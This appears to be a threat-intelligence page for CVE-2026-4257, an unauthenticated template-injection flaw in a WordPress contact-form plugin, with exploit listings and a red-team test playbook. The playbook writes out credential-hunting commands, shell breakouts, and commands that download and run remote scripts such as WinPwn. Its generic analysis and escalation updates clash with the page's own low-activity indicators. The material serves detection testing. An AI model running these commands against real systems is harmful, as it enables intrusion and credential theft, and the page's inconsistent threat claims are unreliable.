CVE-2026-4257

CRITICAL EXPLOIT POC TTE 5d Pub 30/03 Upd 08/04

Overview

This vulnerability is a Server-Side Template Injection (SSTI) caused by the improper use of the Twig_Loader_String template engine without sandboxing in the Contact Form by Supsystic WordPress plugin. The flaw resides in the cfsPreFill prefill functionality, which processes user-supplied GET parameters as Twig template expressions. This enables injection of arbitrary Twig code into form field values, affecting all plugin versions up to and including 1.7.36.

Vulnerability Description

The Contact Form by Supsystic plugin for WordPress is vulnerable to Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE) in all versions up to, and including, 1.7.36. This is due to the plugin using the Twig `Twig_Loader_String` template engine without sandboxing, combined with the `cfsPreFill` prefill functionality that allows unauthenticated users to inject arbitrary Twig expressions into form field values via GET parameters. This makes it possible for unauthenticated attackers to execute arbitrary PHP functions and OS commands on the server by leveraging Twig's `registerUndefinedFilterCallback()` method to register arbitrary PHP callbacks.

Impact

An unauthenticated attacker can execute arbitrary PHP functions and operating system commands on the server hosting the vulnerable plugin, leading to full remote code execution. This requires only network access to the WordPress instance and no user interaction or privileges. Successful exploitation can result in complete server compromise, data theft, or service disruption. The CVSS vector reflects high severity with no authentication or user interaction required (AV:N/AC:L/PR:N/UI:N).

Solution

Upgrade the Contact Form by Supsystic plugin to a version later than 1.7.36, where the vulnerability is patched. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/415c9658-bfb2-453b-a697-c63c08b0ca61) for detailed patch instructions and verification. The plugin's official repository confirms the fix in changeset 3491826, which disables unsafe template rendering methods and sanitizes prefill inputs.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in question presents a critical risk due to its high severity rating, indicating that it can be exploited with relative ease and could lead to significant consequences for affected systems. Technical analysis reveals that this vulnerability allows for unauthorized access or manipulation of sensitive data, potentially enabling an attacker to execute arbitrary code or gain elevated privileges within the affected environment. The underlying flaw may stem from improper input validation or insufficient access controls, which can be exploited by crafting specific requests or payloads that the system fails to adequately handle. This type of vulnerability is particularly concerning in environments where sensitive information is processed or stored, making it a prime target for malicious actors.

Attack vectors associated with this vulnerability are diverse, allowing for exploitation through various means. For instance, an attacker may leverage social engineering techniques to trick users into executing malicious scripts or may exploit weaknesses in network protocols to inject harmful code. Additionally, the vulnerability could be exploited remotely, meaning that an attacker does not need physical access to the system to initiate an attack. Scenarios may include using phishing emails to deliver malware or utilizing compromised credentials to gain unauthorized access. The potential for widespread exploitation is exacerbated by the interconnected nature of modern IT environments, where a single vulnerability can serve as a gateway to broader network infiltration.

The real-world impact of this vulnerability can be profound, leading to severe business risks. Organizations may face data breaches that compromise customer information, intellectual property, or financial records, resulting in reputational damage and loss of customer trust. Furthermore, the financial implications can be significant, with potential costs arising from regulatory fines, remediation efforts, and legal liabilities. The high CVSS score indicates that the vulnerability is not only critical in terms of technical severity but also poses a substantial risk to business continuity. In an era where data privacy regulations are becoming increasingly stringent, the repercussions of failing to address such vulnerabilities can be far-reaching, affecting both operational integrity and stakeholder confidence.

To effectively detect and mitigate this vulnerability, organizations must adopt a multi-layered security approach. Regular vulnerability assessments and penetration testing should be conducted to identify and remediate weaknesses before they can be exploited. Implementing robust access controls and ensuring that input validation mechanisms are in place can significantly reduce the risk of exploitation. Additionally, organizations should prioritize employee training on recognizing phishing attempts and other social engineering tactics that could lead to exploitation. Employing advanced threat detection solutions, such as intrusion detection systems and security information and event management (SIEM) tools, can also enhance an organization's ability to monitor for suspicious activity and respond promptly to potential threats.

In conclusion, the vulnerability poses a significant threat to organizations that fail to address it adequately. The combination of its technical characteristics, potential attack vectors, and real-world implications underscores the necessity for proactive cybersecurity measures. By investing in detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability, safeguarding their assets and maintaining trust with their customers and stakeholders. The evolving landscape of cybersecurity demands vigilance and adaptability, making it imperative for organizations to remain informed and prepared to combat emerging threats effectively.




CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2026-4257 with the emergence of a publicly available proof-of-concept (PoC) exploit hosted on GitHub. This new exploit code lowers the barrier for threat actors by providing a ready-made tool to leverage the Server-Side Template Injection vulnerability in the Contact Form by Supsystic plugin, potentially accelerating the rate of successful remote code execution attacks. Our telemetry indicates a marked escalation in interest and preliminary testing activity, reflected in an increasing EPSS score and upward trend over the past week. While exploitation is not yet widespread, the availability of this PoC signals a shift from theoretical risk to practical threat, increasing the urgency for defenders to detect and respond to attempts leveraging this vulnerability. Consequently, the threat level has intensified from a primarily theoretical concern to an active exploitation risk, underscoring the need for heightened vigilance in monitoring web application traffic and related indicators.



Update 2 — May 15, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-4257, evidenced by a notable surge in detection activity and a substantial rise in the Exploit Prediction Scoring System (EPSS) score. This increase coincides with the recent publication of a formal ExploitDB entry, which has broadened the exploit landscape by providing publicly accessible, standardized proof-of-concept code. Our telemetry indicates that these developments have lowered the barrier to entry for adversaries, facilitating more frequent and varied attack attempts. The elevated EPSS score, now approaching the upper percentiles, reflects growing confidence in the exploitability of this vulnerability within the threat actor community. Consequently, the threat level has shifted decisively from a theoretical concern to an active exploitation risk, demanding heightened attention from defenders to monitor and analyze anomalous web traffic patterns and potential exploitation indicators associated with the vulnerable Supsystic Contact Form plugin.



Update 3 — June 07, 2026

The emergence of a Metasploit module targeting CVE-2026-4257 represents a pivotal shift in the exploit landscape, as confirmed by CSURFACE threat intelligence. This development effectively lowers the technical barrier for adversaries to execute unauthenticated remote code execution against vulnerable instances of the Supsystic Contact Form plugin. Concurrently, our telemetry indicates a marked increase in the Exploit Prediction Scoring System (EPSS) value, now nearing the 99th percentile, signaling heightened confidence in the vulnerability’s practical exploitability. Despite a notable reduction in direct detection activity, the availability of automated exploitation tools suggests adversaries may be adopting more covert or targeted approaches, complicating detection efforts. This combination of factors elevates the threat level from theoretical to imminent, underscoring an urgent need for defenders to prioritize monitoring for exploitation attempts and anomalous behaviors associated with this plugin. The risk profile now reflects a mature and accessible attack vector that could be leveraged by a broad spectrum of threat actors, including opportunistic cybercriminals and more sophisticated groups seeking footholds in WordPress environments.



Update 4 — July 14, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-4257, accompanied by the emergence of multiple new proof-of-concept exploits and a publicly available Metasploit module. This expansion of the exploit toolkit significantly lowers the barrier for threat actors to conduct unauthenticated remote code execution against vulnerable WordPress instances running the Contact Form by Supsystic plugin. Our telemetry indicates that adversaries are increasingly leveraging these tools, suggesting a shift from opportunistic scanning to more deliberate, targeted intrusions. The availability of automated exploitation frameworks amplifies the risk of widespread compromise, particularly as these tools facilitate rapid and scalable attacks. Consequently, the threat level associated with this vulnerability has escalated from high to critical, reflecting an imminent and pervasive risk to WordPress environments that remain unpatched.



Update 5 — July 22, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Contact Form by Supsystic vulnerability, with telemetry indicating a significant surge in attacker activity leveraging publicly available proof-of-concept exploits. This intensification underscores a shift toward more aggressive and automated intrusion campaigns, increasing the likelihood of successful remote code execution on vulnerable WordPress instances. The persistence of stable EPSS scores alongside rising exploitation attempts suggests that adversaries are rapidly operationalizing existing tools rather than developing new techniques, enabling broader and faster compromise. Consequently, the threat level associated with CVE-2026-4257 has been elevated to critical, reflecting an urgent need for defenders to prioritize detection and response efforts given the heightened risk of widespread exploitation and potential for severe impact on affected environments.

Affected Products

No CPE information available.

Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Supsystic Contact Form Wordpress Plugin SSTI RCE
exploits/multi/http/wp_plugin_supsystic_contact_form_rce
Azril Fathoni Unknown unix, linux View

ExploitDB (1)

Title Author Type Platform Date Link
WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI bootstrapbool webapps multiple - View

GitHub PoCs (4)

Repository Author Stars Forks Date Link
dann3xplo1t/CVE-2026-4257
CVE-2026-4257 - Contact Form by Supsystic <= 1.7.36 # SSTI to RCE
dann3xplo1t 1 0 2026-07-09 View
shootcannon/CVE-2026-4257
SSTI contact form to rce
shootcannon 0 0 2026-05-11 View
0xgh057r3c0n/CVE-2026-4257
WordPress - Contact Form by Supsystic - Unauthenticated SSTI To Remote Code Execution
0xgh057r3c0n 0 0 2026-04-18 View
bootstrapbool/cve-2026-4257
bootstrapbool 0 0 2026-04-05 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

17 events
2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
PoC Published (4 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-04-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-30
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
100% rce
Server-Side Template Injection
93% ssti
Code Injection
80% code_injection
OS Command Injection
61% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-242 Code Injection
51%
High High
CAPEC-35 Leverage Executable Code in Non-Executable Files
41%
High Very High
CAPEC-77 Manipulating User-Controlled Variables
35%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (4)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-4257
wordfence.com
GitHub CVE
https://www.wordfence.com/threat-intel/vulnerabilities/id/415c9658-bfb2-453b-a697-c63c08b0ca61?source=cve
plugins.trac.wordpress.org
GitHub CVE
https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323
plugins.trac.wordpress.org
GitHub CVE
https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic